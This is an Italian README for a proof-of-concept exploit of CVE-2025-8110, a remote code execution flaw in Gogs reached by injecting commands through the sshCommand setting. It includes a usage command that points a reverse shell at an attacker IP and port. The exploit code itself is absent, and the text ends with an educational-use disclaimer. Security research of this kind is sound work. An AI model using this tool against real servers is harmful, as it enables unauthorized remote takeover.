
CVE-2025-8110 PoC
Questa repository contiene una Proof of Concept (PoC) per CVE-2025-8110, una vulnerabilità di Remote Code Execution (RCE) in Gogs. L'exploit prende di mira l'implementazione del server SSH interno, consentendo agli attaccanti di iniettare comandi malevoli tramite la configurazione sshCommand.
Per eseguire l'exploit, utilizza lo script CVE-2025-8110.py con l'URL di Gogs target e il tuo host/porta di ascolto per la reverse shell.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: URL di base dell'istanza Gogs target (es., http://localhost:3000).-lh, --host: Indirizzo IP a cui la reverse shell deve connettersi.-lp, --port: Porta a cui la reverse shell deve connettersi.-x, --proxy: (Opzionale) Usa un proxy locale su http://localhost:8080 per il debug.Questa Proof of Concept (PoC) ha esclusivamente scopi educativi e di ricerca. È pensata per aiutare i ricercatori di sicurezza e gli amministratori a comprendere e mitigare la vulnerabilità CVE-2025-8110.
L'autore non si assume alcuna responsabilità per qualsiasi uso non autorizzato o malevolo di questo codice. Utilizza questo strumento solo su sistemi di tua proprietà o per cui hai esplicito permesso di test. Usando questo codice, accetti di assumerti la piena responsabilità delle tue azioni.